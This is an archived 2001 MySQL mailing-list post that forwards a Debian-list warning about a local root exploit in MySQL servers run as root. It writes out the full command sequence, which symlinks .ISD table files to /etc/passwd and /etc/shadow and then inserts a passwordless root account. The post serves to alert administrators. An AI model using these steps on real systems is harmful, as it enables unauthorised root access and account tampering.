warning: mysql local root exploit when running as root

Thu, 22 Mar 2001 13:27:28 -0800 

Hello

This one appeared on a Debian mailing list.
I know that this is fixed in the latest versions as they allow running the
server as non-root user and so it is not considered as a bug (....)
but I'm sure that there're administrators out there which are not aware of
this exploiting method!

bye,

 -christian-

-- 
Christian Hammers    WESTEND GmbH - Aachen und Dueren     Tel 0241/701333-0
[EMAIL PROTECTED]     Internet & Security for Professionals    Fax 0241/911879
           WESTEND ist CISCO Systems Partner - Premium Certified


Hi,

At first, an apology if this came by earlier, i accidentally removed quite
some debian-* mail, and i don't know of a -private archive for developers.

As seen on some mailinglist, can't remember which one:

$ cd /var/tmp
$ ln -s /etc/passwd gotcha.ISD
$ ln -s /etc/shadow make_me_r00t.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table gotcha(qqq varchar(255));
create table make_me_r00t(qqq varchar(255));
insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
\q

Testing/unstable both have >=3.23-ish, stable has 3.22-ish. testing/unstable
are not vulnerable, i didn't have a stable box at hand to try.
Anyone who has tried this on stable? In my opinion, the whole idea of being 
able to specify an alternate database location to the mysql server is a 
problem, and I never have seen a real use for it (correct me if i'm wrong).
I'm pondering on filing a bug against mysql-server for the whole
alternate-location thing (bugs keep popping up with stuff ranging from these
symlink tricks to stuff like 'select * from infile'-ish problems that allow
reading from any file).

Greets,
        Robert

-- 
                                Linux Generation


-- 
Please respect the privacy of this mailing list.

To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



---------------------------------------------------------------------
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/           (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Reply via email to